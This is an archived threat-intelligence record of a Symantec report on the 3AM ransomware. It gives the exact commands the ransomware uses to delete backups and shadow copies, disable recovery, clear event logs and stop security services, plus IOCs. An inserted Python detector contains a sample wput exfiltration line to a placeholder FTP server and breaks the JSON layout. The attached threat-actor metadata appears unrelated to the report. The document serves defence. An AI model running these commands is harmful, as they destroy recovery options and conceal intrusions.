{
	"id": "7d4f9ac4-bd24-4c18-af45-b0a5e5c570fa",
	"created_at": "2026-04-06T00:14:34.930946Z",
	"updated_at": "2026-04-10T03:24:23.981696Z",
	"deleted_at": null,
	"sha1_hash": "f26db4677019684a3da2ea08b7d6608cec77cb43",
	"title": "3AM: New Ransomware Family Used As Fallback in Failed LockBit Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 51015,
	"plain_text": "3AM: New Ransomware Family Used As Fallback in Failed LockBit Attack\r\nArchived: 2026-04-05 13:32:40 UTC\r\nA new ransomware family calling itself 3AM has emerged. To date, the ransomware has only been used in a\r\nlimited fashion. Symantec’s Threat Hunter Team, part of Broadcom, has seen it used in a single attack by a\r\nransomware affiliate that attempted to deploy LockBit on a target’s network and then switched to 3AM when\r\nLockBit was blocked.\r\n3AM is written in Rust and appears to be a completely new malware family. The ransomware attempts to stop\r\nmultiple services on the infected computer before it begins encrypting files. Once encryption is complete, it\r\nattempts to delete Volume Shadow Copy Service (VSS) snapshots. It is still unclear whether its authors have any links to known\r\ncybercrime organizations.\r\nAttack Preparation\r\nThe first suspicious activity from the threat actor involved the use of the gpresult command to dump the policy\r\nsettings enforced on the computer for a specified user. The attacker also executed various Cobalt Strike\r\ncomponents and tried to escalate privileges on the computer using PsExec.\r\nThe attackers then ran reconnaissance commands such as whoami, netstat, quser, and net share, and tried to\r\nenumerate other servers for lateral movement with the quser and net view commands. They also added a new user\r\nfor persistence and used the Wput tool to exfiltrate the victims’ files to their own FTP server.\r\nThe attackers first attempted to use the LockBit ransomware but when that was blocked, they resorted to 3AM\r\ninstead. The use of 3AM was only partially successful. The attackers only managed to deploy it to three machines\r\non the organization's network and it was blocked on two of those three computers.\r\n3AM Analysis\r\n3AM is so called because it appends encrypted files with the extension .threeamtime. The ransom note also makes\r\nreference to 3AM:\r\nHello. \"3 am\" The time of mysticism, isn't it?\r\nAll your files are mysteriously encrypted, and the systems \"show no signs of life\", the backups disappeared. But\r\nwe can correct this very quickly and return all your files and operation of the systems to original state.\r\nAll your attempts to restore data by himself will definitely lead to their damage and the impossibility of recovery.\r\nWe are not recommended to you to do it on our own!!! (or do at your own peril and risk).\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit\r\nPage 1 of 7\n\nThere is another important point: we stole a fairly large amount of sensitive data from your local network:\r\nfinancial documents; personal information of your employees, customers, partners; work documentation, postal\r\ncorrespondence and much more.\r\nWe prefer to keep it secret, we have no goal to destroy your business. Therefore can be no leakage on our part.\r\nWe propose to reach an agreement and conclude a deal.\r\nOtherwise, your data will be sold to DarkNet/DarkWeb. One can only guess how they will be used.\r\nPlease contact us as soon as possible, using Tor-browser:\r\nhttp://threeam7[REDACTED].onion/recovery \r\nAccess key:\r\n[32 CHARS SPECIFIED BY -k COMMAND LINE PARAMETER]\r\nThe ransomware is a 64-bit executable written in Rust and it recognises the following command-line parameters:\r\n\"-k\" – 32 Base64 characters, referred to as \"Access key\" in the ransom note\r\n\"-p\" – Unknown\r\n\"-h\" – Unknown\r\n\"-m\" – Method, where the code checks one of two values before running encryption logic:\r\n\"local\"\r\n\"net\"\r\n\"-s\" – determines offsets within files for encryption to control encryption speed. This is expressed in the\r\nform of decimal digits.\r\nThe command-line parameters \"-m\" and \"-h\" are mutually exclusive.\r\n
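Both the reconnaissance and exfiltration tooling from the Attack Preparation section (gpresult, whoami, quser, net view, Wput) and the pre-encryption commands listed below (wbadmin, bcdedit, wmic, wevtutil, netsh and the long run of net stop calls) are plain process-creation events that an endpoint sensor records. The Python below is an added example and not code from the Symantec post: it classifies constructed process-creation events in a timestamp|host|command line layout, also recognises the ransomware's own invocation by the -k value of 32 Base64 characters combined with -m local or -m net, and only raises a host once several distinct behaviours co-occur, so a lone net stop on an administrator's workstation does not page anyone. The host names, the binary name threeam.exe, the upload path, the FTP address 203.0.113.5, the three-behaviour threshold and the behaviour labels (with ATT&CK technique IDs where one maps cleanly) are all this example's assumptions.

```python
from collections import defaultdict

DQ = chr(34)  # double-quote character; Windows process logs usually quote the image path

# Behaviours from the post, each as alternative lists of lower-case substrings that
# must all occur in a normalised command line. Labels and the ATT&CK IDs attached to
# some of them are this example's own mapping, not something the post states.
BEHAVIOURS = {
    'inhibit-recovery (T1490)': [
        ['wbadmin', 'delete systemstatebackup'],
        ['bcdedit', 'recoveryenabled no'],
        ['bcdedit', 'bootstatuspolicy ignoreallfailures'],
        ['wmic', 'shadowcopy delete'],
        ['vssadmin', 'delete shadows'],
    ],
    'clear-event-logs (T1070.001)': [['wevtutil cl ']],
    'modify-firewall (T1562.004)': [['netsh', 'advfirewall firewall set rule']],
    'stop-service (T1489)': [['net stop /y ']],
    'recon': [['gpresult'], ['whoami'], ['netstat'], ['quser'], ['net share'], ['net view']],
    'ftp-upload-tool': [['wput']],
}
B64 = set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=')


def normalise(cmdline):
    # Strip quoting and collapse whitespace so the quoted and unquoted forms compare equal.
    return ' '.join(cmdline.replace(DQ, ' ').split()).lower()


def looks_like_3am_invocation(cmdline):
    # The post documents -k (32 Base64 characters) and -m local|net; requiring both
    # together is this example's choice of signature.
    toks = normalise(cmdline).split()
    key_ok = mode_ok = False
    for i in range(len(toks) - 1):
        tok, nxt = toks[i], toks[i + 1]
        if tok == '-k' and len(nxt) == 32 and set(nxt) <= B64:
            key_ok = True
        if tok == '-m' and nxt in ('local', 'net'):
            mode_ok = True
    return key_ok and mode_ok


def classify(cmdline):
    '''Return the set of behaviour labels one command line triggers.'''
    norm = normalise(cmdline)
    hits = {label for label, alts in BEHAVIOURS.items()
            if any(all(needle in norm for needle in needles) for needles in alts)}
    if looks_like_3am_invocation(cmdline):
        hits.add('3am-invocation')
    return hits


def score_hosts(events, threshold=3):
    '''events are timestamp|host|command line strings. Returns {host: sorted labels}
    for hosts showing at least threshold distinct behaviours; this correlation is what
    keeps a lone net stop on an admin workstation from paging anyone.'''
    per_host = defaultdict(set)
    for line in events:
        _ts, host, cmdline = line.split('|', 2)
        per_host[host] |= classify(cmdline)
    return {h: sorted(v) for h, v in per_host.items() if len(v) >= threshold}


# Constructed sample telemetry, not from the post. Host names, the binary name
# threeam.exe, the upload path and the FTP address 203.0.113.5 are all made up.
SAMPLE_EVENTS = [
    '2023-09-01T02:40:00Z|SRV01|gpresult /r',
    '2023-09-01T02:41:00Z|SRV01|quser',
    '2023-09-01T02:55:00Z|SRV01|wput.exe C:/share/finance/ ftp://203.0.113.5/up/',
    '2023-09-01T03:00:01Z|SRV01|' + DQ + 'wbadmin.exe' + DQ + ' delete systemstatebackup -keepVersions:0 -quiet',
    '2023-09-01T03:00:02Z|SRV01|bcdedit.exe /set {default} recoveryenabled No',
    '2023-09-01T03:00:03Z|SRV01|cmd.exe /c wevtutil cl security',
    '2023-09-01T03:00:04Z|SRV01|net stop /y VeeamTransportSvc',
    '2023-09-01T03:00:05Z|SRV01|threeam.exe -k ' + 'A' * 32 + ' -m local -s 30',
    '2023-09-01T09:15:00Z|WKS07|whoami /all',
    '2023-09-01T09:16:00Z|WKS07|net stop /y spooler',
    '2023-09-01T09:17:00Z|WKS07|vssadmin.exe list shadows',
]

if __name__ == '__main__':
    for host, labels in score_hosts(SAMPLE_EVENTS).items():
        print(host, labels)
```

Run stand-alone it reports only SRV01, which trips six distinct behaviours, while WKS07 (one recon command and one unrelated net stop) stays below the threshold. To use it on real telemetry, feed Sysmon event ID 1 or Windows Security event 4688 command lines in the same timestamp|host|command line shape in place of SAMPLE_EVENTS; because quoting is stripped before matching, both the quoted image form that Symantec lists and the unquoted form produce the same labels. The threshold is a tuning knob: raise it on hosts where backup agents are legitimately restarted, and add the -s offset parameter to the invocation check only once you have seen how the operator actually uses it.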
The use of the “-h” and “-m” parameters, and of the values “local” and “net”, closely resembles the arguments used by Conti.\r\nWhen the malware is executed, it attempts to run the following commands, most of which attempt to stop various\r\nsecurity- and backup-related software:\r\n\"netsh.exe\" advfirewall firewall set rule \"group=”Network Discovery”\" new enable=Yes\r\n\"wbadmin.exe\" delete systemstatebackup -keepVersions:0 -quiet\r\n\"wbadmin.exe\" DELETE SYSTEMSTATEBACKUP\r\n\"wbadmin.exe\" DELETE SYSTEMSTATEBACKUP -deleteOldest\r\n\"bcdedit.exe\" /set {default} recoveryenabled No\r\n\"bcdedit.exe\" /set {default} bootstatuspolicy ignoreallfailures\r\n\"wmic.exe\" SHADOWCOPY DELETE /nointeractive\r\n\"cmd.exe\" /c wevtutil cl security\r\n\"cmd.exe\" /c wevtutil cl system\r\n\"cmd.exe\" /c wevtutil cl application\r\n\"net\" stop /y vmcomp\r\n\"net\" stop /y vmwp\r\n\"net\" stop /y veeam\r\n\"net\" stop /y Back\r\n\"net\" stop /y xchange\r\n\"net\" stop /y backup\r\n\"net\" stop /y Backup\r\n\"net\" stop /y acronis\r\n\"net\" stop /y AcronisAgent\r\n\"net\" stop /y AcrSch2Svc\r\n\"net\" stop /y sql\r\n\"net\" stop /y Enterprise\r\n\"net\" stop /y Veeam\r\n\"net\" stop /y VeeamTransportSvc\r\n\"net\" stop /y VeeamNFSSvc\r\n\"net\" stop /y AcrSch\r\n\"net\" stop /y bedbg\r\n\"net\" stop /y DCAgent\r\n\"net\" stop /y EPSecurity\r\n\"net\" stop /y EPUpdate\r\n\"net\" stop /y Eraser\r\n\"net\" stop /y EsgShKernel\r\n\"net\" stop /y FA_Scheduler\r\n\"net\" stop /y IISAdmin\r\n\"net\" stop /y IMAP4\r\n\"net\" stop /y MBAM\r\n\"net\" stop /y Endpoint\r\n\"net\" stop /y Afee\r\n\"net\" stop /y McShield\r\n\"net\" stop /y task\r\n\"net\" stop /y mfemms\r\n\"net\" stop /y mfevtp\r\n\"net\" stop /y mms\r\n\"net\" stop /y MsDts\r\n\"net\" stop /y Exchange\r\n\"net\" stop /y ntrt\r\n\"net\" stop /y PDVF\r\n\"net\" stop /y POP3\r\n\"net\" stop /y Report\r\n\"net\" stop /y RESvc\r\n\"net\" stop /y Monitor\r\n\"net\" stop /y Smcinst\r\n\"net\" stop /y SmcService\r\n\"net\" stop /y SMTP\r\n\"net\" stop /y SNAC\r\n\"net\" stop /y swi_\r\n\"net\" stop /y CCSF\r\n\"net\" stop /y ccEvtMgr\r\n\"net\" stop /y ccSetMgr\r\n\"net\" stop /y TrueKey\r\n\"net\" stop /y tmlisten\r\n\"net\" stop /y UIODetect\r\n\"net\" stop /y W3S\r\n\"net\" stop /y WRSVC\r\n\"net\" stop /y NetMsmq\r\n\"net\" stop /y ekrn\r\n\"net\" stop /y EhttpSrv\r\n\"net\" stop /y ESHASRV\r\n\"net\" stop /y AVP\r\n\"net\" stop /y klnagent\r\n\"net\" stop /y wbengine\r\n\"net\" stop /y KAVF\r\n\"net\" stop /y mfefire\r\n\"net\" stop /y svc$\r\n\"net\" stop /y memtas\r\n\"net\" stop /y mepocs\r\n\"net\" stop /y GxVss\r\n\"net\" stop /y GxCVD\r\n\"net\" stop /y GxBlr\r\n\"net\" stop /y GxFWD\r\n\"net\" stop /y GxCIMgr\r\n\"net\" stop /y BackupExecVSSProvider\r\n\"net\" stop /y BackupExecManagementService\r\n\"net\" stop /y BackupExecJobEngine\r\n\"net\" stop /y BackupExecDiveciMediaService\r\n\"net\" stop /y BackupExecAgentBrowser\r\n\"net\" stop /y BackupExecAgentAccelerator\r\n\"net\" stop /y vss\r\n\"net\" stop /y BacupExecRPCService\r\n\"net\" stop /y CASAD2WebSvc\r\n\"net\" stop /y CAARCUpdateSvc\r\n\"net\" stop /y YooBackup\r\n\"net\" stop /y YooIT\r\nThe ransomware then scans the disk; any files matching its predefined criteria are encrypted and the original\r\nfiles are deleted. The malware will then create the file \"RECOVER-FILES.txt\" in each scanned folder. This file\r\ncontains the ransom note.\r\nThe encrypted files contain a marker string \"0x666\" followed by the data appended by the ransomware.\r\nAfter encryption, the malware attempts to run the following command to delete volume shadow backup copies:\r\nvssadmin.exe delete shadows /all /quiet\r\nWarning Signs\r\nRansomware affiliates have become increasingly independent from ransomware operators, and this is not the first\r\ntime Symantec has seen an attacker attempt to deploy two different kinds of ransomware in a single attack.\r\nNew ransomware families appear frequently and most disappear just as quickly or never manage to gain\r\nsignificant traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may\r\nbe of interest to attackers and could be seen again in the future.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nSHA256 file hashes:\r\n079b99f6601f0f6258f4220438de4e175eb4853649c2d34ada72cce6b1702e22 – LockBit\r\n307a1217aac33c4b7a9cd923162439c19483e952c2ceb15aa82a98b46ff8942e – 3AM\r\n680677e14e50f526cced739890ed02fc01da275f9db59482d96b96fbc092d2f4 – Cobalt Strike\r\n991ee9548b55e5c815cc877af970542312cff79b3ba01a04a469b645c5d880af – Cobalt Strike\r\necbdb9cb442a2c712c6fb8aee0ae68758bc79fa064251bab53b62f9e7156febc – Cobalt Strike\r\nNetwork indicators:\r\n185.202.0[.]111\r\n212.18.104[.]6\r\n85.159.229[.]62\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit"
	],
	"report_names": [
		"3am-ransomware-lockbit"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434474,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f26db4677019684a3da2ea08b7d6608cec77cb43.pdf",
		"text": "https://archive.orkl.eu/f26db4677019684a3da2ea08b7d6608cec77cb43.txt",
		"img": "https://archive.orkl.eu/f26db4677019684a3da2ea08b7d6608cec77cb43.jpg"
	}
}